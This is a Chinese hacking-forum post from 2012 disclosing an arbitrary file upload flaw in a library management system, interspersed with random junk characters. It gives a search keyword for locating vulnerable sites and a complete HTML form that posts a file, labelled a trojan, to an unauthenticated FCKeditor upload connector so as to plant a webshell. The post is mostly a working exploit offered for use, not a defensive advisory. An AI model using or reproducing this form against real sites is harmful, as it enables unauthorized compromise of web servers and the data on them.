主题:图书馆系统任意文件上传漏洞
# R' S/ O, @; W3 B6 B% Y0 J3 e5 g 作者:冰锋刺客3 M* ]# m6 p* i! s C4 z* O# V& J
厂商:点击书(dianjishu.com)
- `; S( B% Z* ^6 q( D 日期:2012-6-21" E M. l- c1 J) ~8 k
0 f5 V$ E3 W) _. ~5 D9 DI 概述( n& q# D1 W1 { M" U% e/ W m
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
- X" M$ D0 c8 _; \. @" }8 s II 简介
/ ]# Y8 ]* l5 K' N, Q 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
4 t# V8 H2 C7 h3 R7 o5 n 补充一个漏洞 J' P2 ~. ^9 f# |
<form id="frmUpload" enctype="multipart/form-data"0 K& @7 G$ u" {1 l' `- z* w
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>1 ^+ z: W+ W4 B
<input id="btnUpload" type="submit" value="操翻他">
* x' G9 P0 b6 t. m' v6 l </form>! t# {; P1 M1 h9 U" x
你们懂的7 _0 ~7 C3 i3 h2 o
那傻逼提供还需要改包.
: g- E1 r$ i# a) c( I2 F/ ~& _ 自己看了下源代码发现fckeditor" t, ~0 w) b. e0 t( S$ s& u
直接秒杀+ L1 U- i0 k- ^$ A* X
|
发表于 2012-9-10 21:20:59
收藏
支持
反对